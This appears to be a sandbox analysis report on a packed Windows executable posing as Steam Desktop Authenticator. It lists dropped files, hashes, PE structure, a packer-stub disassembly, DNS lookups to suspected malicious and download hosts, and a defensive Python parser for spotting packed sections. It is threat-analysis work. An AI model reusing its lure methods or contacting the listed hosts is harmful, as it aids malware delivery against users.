                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpEFBE.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpEFBF.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpEFC0.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            Process:C:\Users\user\Desktop\kS2dqbsDwD.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):979968
                                                                                                                                                                            Entropy (8bit):7.361382512565047
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:cGRXJBEsyGeV5qLHKK1QK1MuSUqMidk++KANTbCPpUlmLXIRE:T9JB8rWHKK131MuadkJK4qrXIW
                                                                                                                                                                            MD5:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                            SHA1:BB965F2D97B19ED01702B8182BBD870670A1E75B
                                                                                                                                                                            SHA-256:20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
                                                                                                                                                                            SHA-512:BD6C23385D7B914AD9A423D71DF9FA33BA917BA696270DF1435D90DE24B7B1286A7263FD10A027C17C41A899E5667F4481C83B385931ECCD244AEA7971D519F2
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: Nb2HQZZDIf.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: P58w6OezJY.exe, Detection: malicious, Browse
                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`................."...........@... ...`....@.. ....................................@.................................P@..K.......0....................`....................................................... ............... ..H............text.... ... ...".................. ..`.sdata.. ....`.......&..............@....rsrc...0............(..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Roaming\field
                                                                                                                                                                            Process:C:\Users\user\Desktop\kS2dqbsDwD.exe
                                                                                                                                                                            File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                            Entropy (8bit):4.529003957966892
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/09h/rywOhSllln+wbp:6v/lhPfkCDtmywFghK9hm9Wlln+Yp
                                                                                                                                                                            MD5:EC6AAE2BB7D8781226EA61ADCA8F0586
                                                                                                                                                                            SHA1:D82B3BAD240F263C1B887C7C0CC4C2FF0E86DFE3
                                                                                                                                                                            SHA-256:B02FFFABA9E664FF7840C82B102D6851EC0BB148CEC462CEF40999545309E599
                                                                                                                                                                            SHA-512:AA62A8CD02A03E4F462F76AE6FF2E43849052CE77CCA3A2CCF593F6669425830D0910AFAC3CF2C46DD385454A6FB3B4BD604AE13B9586087D6F22DE644F9DFC7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....pHYs..........+......IDAT..c`.......qd.....IEND.B`.

                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                            Entropy (8bit):7.218310131625728
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                            File name:kS2dqbsDwD.exe
                                                                                                                                                                            File size:598944
                                                                                                                                                                            MD5:888ab99280a081717ec5c5749266d1bd
                                                                                                                                                                            SHA1:3a071aeadd42c1232ff2878d2adf7f1e4a629180
                                                                                                                                                                            SHA256:e726f2014db779e3605f60499f84676ceb45160c6d092bedfa115f7e09d693e8
                                                                                                                                                                            SHA512:85b78c1489ed6a8fd375380595f3597968d026de0bd0cfe58e26cd4d6590f1d171626c0a8f677cc71d7405e5e647ede4692e615fd63a63597db724da15dc2299
                                                                                                                                                                            SSDEEP:12288:67iuUvUF2JURoyPa5UA5/zfqb3HtwQG99:67iuUv8Paz/2ZwJ99
                                                                                                                                                                            File Content Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d....4.V..........#.................R..........@.......................................... ...@.................................................X............p..4_.......'.................

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:d2ae86929a86a2c2

                                                                                                                                                                            Static PE Info

                                                                                                                                                                            General

                                                                                                                                                                            Entrypoint:0x14013c352
                                                                                                                                                                            Entrypoint Section:.MPRESS2
                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA
                                                                                                                                                                            Time Stamp:0x56F734A2 [Sun Mar 27 01:17:22 2016 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                            OS Version Minor:2
                                                                                                                                                                            File Version Major:5
                                                                                                                                                                            File Version Minor:2
                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                            Subsystem Version Minor:2
                                                                                                                                                                            Import Hash:caa5e6a2892587c2324418efee31c648

                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                            Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                            • 5/22/2019 5:00:00 PM 5/23/2023 4:59:59 PM
                                                                                                                                                                            Subject Chain
                                                                                                                                                                            • CN=Sublime HQ Pty Ltd, O=Sublime HQ Pty Ltd, STREET=Suite 102, STREET=377 New South Head Rd, L=Doubte Bay, S=NSW, PostalCode=2028, C=AU
                                                                                                                                                                            Version:3
                                                                                                                                                                            Thumbprint MD5:A32549731E28A0F6BA85C9B2C50FE589
                                                                                                                                                                            Thumbprint SHA-1:834F29A60152CE36EB54AF37CA5F8EC029ECCF01
                                                                                                                                                                            Thumbprint SHA-256:E025B15847B86808B69C605D7FC63A186CBF1D9A4ED5A1971B2FF5F9C6F50DF0
                                                                                                                                                                            Serial:00972FADA2BC13FA55C5D47FEF56AEE0F4

                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                            Instruction
                                                                                                                                                                            push edi
                                                                                                                                                                            push esi
                                                                                                                                                                            push ebx
                                                                                                                                                                            push ecx
                                                                                                                                                                            push edx
                                                                                                                                                                            inc ecx
                                                                                                                                                                            push eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            lea eax, dword ptr [00000ADEh]
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov esi, dword ptr [eax]
                                                                                                                                                                            dec eax
                                                                                                                                                                            add esi, eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            sub eax, eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov edi, esi
                                                                                                                                                                            lodsw
                                                                                                                                                                            shl eax, 0Ch
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                            push eax
                                                                                                                                                                            lodsd
                                                                                                                                                                            sub ecx, eax
dec eax
add esi, ecx
mov ecx, eax
push edi
inc esp
mov eax, ecx
dec ecx
mov al, byte ptr [ecx+edi+06h]
mov byte ptr [ecx+esi], al
jne 00007F491C93DB07h
inc ecx
push ecx
push ebp
sub eax, eax
lodsb
mov ecx, eax
shr ecx, 04h
push ecx
and al, 0Fh
push eax
lodsb
mov ecx, eax
add cl, byte ptr [esp]
push eax
dec eax
mov ebp, FFFFFD00h
dec eax
shl ebp, cl
pop ecx
pop eax
dec eax
shl eax, 20h
dec eax
add ecx, eax
pop eax
dec eax
mov ebx, esp
dec eax
lea esp, dword ptr [esp+ebp*2-00000E70h]
push eax
push ecx
dec eax
sub ecx, ecx
push ecx
push ecx
dec eax
mov ecx, esp
push ecx
mov dx, word ptr [edi]
shl edx, 0Ch
push edx
push edi
dec esp
lea ecx, dword ptr [ecx+08h]
dec ecx
lea ecx, dword ptr [ecx+08h]
push esi
pop edx
dec eax
sub esp, 20h
call 00007F491C93DBDDh
dec eax
mov esp, ebx
pop ebp
inc ecx
pop ecx
pop esi
pop edx
sub edx, 00001000h
sub ecx, ecx
cmp ecx, edx
jnc 00007F491C93DB5Ch
mov ebx, ecx
lodsb
inc ecx
cmp al, FFh
jne 00007F491C93DB1Fh
mov al, byte ptr [esi]
and al, FDh
cmp al, 15h
jne 00007F491C93DAFDh
lodsb
inc ecx
jmp 00007F491C93DB29h
cmp al, 8Dh
jne 00007F491C93DB1Fh
mov al, byte ptr [esi]
and al, C7h

Note on this listing: it is x64 code decoded as 32-bit. The dec eax, dec ecx, inc ecx, inc esp and dec esp that sit directly in front of mov, shl, lea and pop are the REX prefix bytes 48h, 49h, 41h, 44h and 4Ch, not instructions; dec eax / mov ebp, FFFFFD00h is mov rbp, -300h, dec eax / shl eax, 20h is shl rax, 32, and inc ecx / pop ecx is pop r9. Operand widths and branch targets should be re-derived with a 64-bit decoder before drawing conclusions from this stub. The non-empty exception directory in the Data Directories table below (PE32+ images carry unwind data there) is consistent with a 64-bit binary.

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x13c000         0x358         .MPRESS2
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x13d000         0x2b508       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x107000         0x5f34        .MPRESS1
IMAGE_DIRECTORY_ENTRY_SECURITY        0x8fc00          0x27a0        .MPRESS1
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x13ce50         0x28          .MPRESS2
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x13c118         0xd0          .MPRESS2
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name      Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.MPRESS1  0x1000           0x13b000      0x63400   False     1.00031240161    data       7.99951858505  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.MPRESS2  0x13c000         0xe80         0x1000    False     0.50732421875    data       5.63658087631  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc     0x13d000         0x2b508       0x2b600   False     0.124651026657   data       3.38878491057  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
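
Added example, not part of the sandbox report and not code from the sample: a minimal PE section-table parser in Python that recomputes the kind of data the Sections table shows (virtual versus raw size, Shannon entropy, characteristics) and applies the three packer indicators that all fire on .MPRESS1 above: entropy close to 8 bits per byte, a virtual size far larger than the raw size (the section is a container that the stub decompresses into), and a section that is both writable and executable. Because the sample itself is not available here, the block builds a small constructed PE32+ image in memory; the section names .PACKED1 and .rsrc, their sizes and their contents are synthetic and chosen only to reproduce the pattern in the table.

```python
import hashlib
import math
import struct
from dataclasses import dataclass
from typing import Dict, List

# Section characteristic flags from winnt.h (IMAGE_SECTION_HEADER.Characteristics).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    raw_pointer: int
    characteristics: int
    entropy: float


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the quantity in the Entropy column."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> List[Section]:
    """Walk DOS header -> PE signature -> COFF header -> IMAGE_SECTION_HEADER array."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header after the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    num_sections, opt_header_size = struct.unpack_from("<H12xH", pe, e_lfanew + 6)
    table = e_lfanew + 4 + 20 + opt_header_size  # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]  # entropy is computed over the on-disk bytes
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                va, vsize, raw_size, raw_ptr, chars, shannon_entropy(raw)))
    return sections


def packer_indicators(s: Section) -> List[str]:
    """The three heuristics that a triage script applies to each row of the Sections table."""
    hits = []
    if s.entropy > 7.0:
        hits.append("high-entropy")
    if (s.characteristics & IMAGE_SCN_MEM_WRITE) and (s.characteristics & IMAGE_SCN_MEM_EXECUTE):
        hits.append("writable-executable")
    if s.raw_size and s.virtual_size > 2 * s.raw_size:
        hits.append("virtual-size-gt-2x-raw")
    return hits


def triage(pe: bytes) -> Dict[str, List[str]]:
    return {s.name: packer_indicators(s) for s in parse_sections(pe)}


def build_constructed_pe() -> bytes:
    """Constructed PE32+ image for this demo (not the analysed sample).
    .PACKED1 mimics a packer section: compressed-looking bytes, virtual size far above raw
    size, writable and executable. .rsrc mimics ordinary read-only, low-entropy data."""
    blob, chunk = b"", b"constructed-seed"
    while len(blob) < 0x1000:  # deterministic stand-in for compressed payload bytes
        chunk = hashlib.sha256(chunk).digest()
        blob += chunk
    packed = blob[:0x1000]
    rsrc = (b"\x90" * 64 + b"\xc3").ljust(0x200, b"\0")

    headers_size = 0x400
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 0xF0, 0x22)  # AMD64, 2 sections
    optional = struct.pack("<H", 0x20B).ljust(0xF0, b"\0")        # PE32+ magic, rest zeroed
    packed_chars = (IMAGE_SCN_CNT_CODE | IMAGE_SCN_CNT_INITIALIZED_DATA
                    | IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE
                    | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    rsrc_chars = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
    hdrs = struct.pack("<8sIIIIIIHHI", b".PACKED1", 0x20000, 0x1000, len(packed),
                       headers_size, 0, 0, 0, 0, packed_chars)
    hdrs += struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), 0x21000, len(rsrc),
                        headers_size + len(packed), 0, 0, 0, 0, rsrc_chars)
    image = (dos + b"PE\0\0" + coff + optional + hdrs).ljust(headers_size, b"\0")
    return image + packed + rsrc


if __name__ == "__main__":
    for s in parse_sections(build_constructed_pe()):
        print(f"{s.name:<9} VA=0x{s.virtual_address:x} VS=0x{s.virtual_size:x} "
              f"RAW=0x{s.raw_size:x} H={s.entropy:.2f} {packer_indicators(s)}")
```

Run it against a real file by replacing build_constructed_pe() with the bytes of the file; the entropy values then match the report's column to within rounding. A section that trips all three indicators, as .MPRESS1 does, is the one to dump from memory after the stub has finished writing to it, since the on-disk bytes are not the code that executes.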

Resources

Name            RVA       Size     Language  Country        Type
RT_ICON         0x13d0f0  0x1ffb   English   United States  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON         0x13f114  0x10828  English   United States  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON         0x14f964  0x94a8   English   United States  data
RT_ICON         0x158e34  0x468    English   United States  GLS_BINARY_LSB_FIRST
RT_ICON         0x1592c4  0x468    English   United States  GLS_BINARY_LSB_FIRST
RT_ICON         0x159754  0x468    English   United States  GLS_BINARY_LSB_FIRST
RT_ICON         0x159be4  0x128    English   United States  GLS_BINARY_LSB_FIRST
RT_ICON         0x159d34  0x5488   English   United States  data
RT_ICON         0x15f1e4  0x4228   English   United States  dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 252, next used block 1056964608
RT_ICON         0x163434  0x25a8   English   United States  data
RT_ICON         0x165a04  0x10a8   English   United States  data
RT_ICON         0x166ad4  0x988    English   United States  data
RT_ICON         0x167484  0x468    English   United States  GLS_BINARY_LSB_FIRST
RT_MENU         0x13ab8c  0x2c8    English   United States  empty
RT_DIALOG       0x13ae54  0xe8     English   United States  empty
RT_ACCELERATOR  0x13af3c  0x48     English   United States  empty
RT_RCDATA       0x13af84  0x103    English   United States  empty
RT_GROUP_ICON   0x167a6c  0x84     English   United States  data
RT_GROUP_ICON   0x167b18  0x14     English   United States  data
RT_GROUP_ICON   0x167b54  0x14     English   United States  data
RT_GROUP_ICON   0x167b90  0x14     English   United States  data
RT_GROUP_ICON   0x167bcc  0x14     English   United States  data
RT_VERSION      0x167c20  0x41e                             data
RT_MANIFEST     0x168080  0x487    English   United States  ASCII text, with very long lines, with no line terminators

Imports

DLL           Import
KERNEL32      GetModuleHandleA, GetProcAddress
WSOCK32.dll   WSACleanup
WINMM.dll     mixerOpen
VERSION.dll   VerQueryValueW
COMCTL32.dll  ImageList_Create
PSAPI.DLL     GetModuleBaseNameW
USER32.dll    GetDC
GDI32.dll     BitBlt
COMDLG32.dll  GetOpenFileNameW
ADVAPI32.dll  RegCloseKey
SHELL32.dll   DragFinish
ole32.dll     CoGetObject
OLEAUT32.dll  SafeArrayGetLBound

Exactly one function per DLL, with KERNEL32 contributing only GetModuleHandleA and GetProcAddress, is the shape of a packer stub's import table, not of the program that eventually runs: the stub keeps a single reference so the loader maps each DLL, then resolves the payload's real imports by name at runtime after decompressing .MPRESS1. The list above therefore says nothing about which APIs the unpacked code calls; those have to be recovered from a memory dump taken after unpacking.

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2017
Assembly Version  1.0.10.0
InternalName      Steam Desktop Authenticator.exe
FileVersion       1.0.10
CompanyName
LegalTrademarks
Comments          Desktop implementation of Steam's mobile authenticator app
ProductName       Steam Desktop Authenticator
ProductVersion    1.0.10
FileDescription   Steam Desktop Authenticator
OriginalFilename  Steam Desktop Authenticator.exe

These strings come from the RT_VERSION resource and are written by whoever builds the file; nothing in the loader checks them, and copying them from a legitimate product is a common lure. Taken alone, the Steam Desktop Authenticator metadata is not evidence of the file's origin and should be weighed against the behavioural results rather than trusted.

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                            Jul 22, 2021 11:43:27.981369019 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:28.054693937 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:28.617409945 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:28.674328089 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:29.461571932 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:29.515253067 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:39.283081055 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:39.342900991 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:50.319731951 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:50.370299101 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:51.512294054 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:51.565135956 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:57.058478117 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:57.131546974 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:59.928487062 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:59.988356113 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:04.846780062 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:04.907150984 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:06.823750973 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:06.884871960 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:06.892400026 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:06.953299999 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:11.579966068 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:11.641484976 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.352585077 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:12.412575006 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:31.821844101 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:31.893857956 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:33.378647089 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:33.436006069 CEST53521238.8.8.8192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 11:42:58.675287962 CEST | 192.168.2.3 | 8.8.8.8 | 0x574a | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Jul 22, 2021 11:42:59.322242022 CEST | 192.168.2.3 | 8.8.8.8 | 0x554 | Standard query (0) | is.gd | A (IP address) | IN (0x0001)
Jul 22, 2021 11:42:59.694236040 CEST | 192.168.2.3 | 8.8.8.8 | 0x65e1 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001)
Jul 22, 2021 11:43:00.422305107 CEST | 192.168.2.3 | 8.8.8.8 | 0xd23c | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001)
Jul 22, 2021 11:44:04.846780062 CEST | 192.168.2.3 | 8.8.8.8 | 0xda5e | Standard query (0) | yspasenana.xyz | A (IP address) | IN (0x0001)
Jul 22, 2021 11:44:06.823750973 CEST | 192.168.2.3 | 8.8.8.8 | 0xd22d | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jul 22, 2021 11:44:06.892400026 CEST | 192.168.2.3 | 8.8.8.8 | 0x9e5c | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jul 22, 2021 11:44:11.579966068 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d94 | Standard query (0) | yspasenana.xyz | A (IP address) | IN (0x0001)
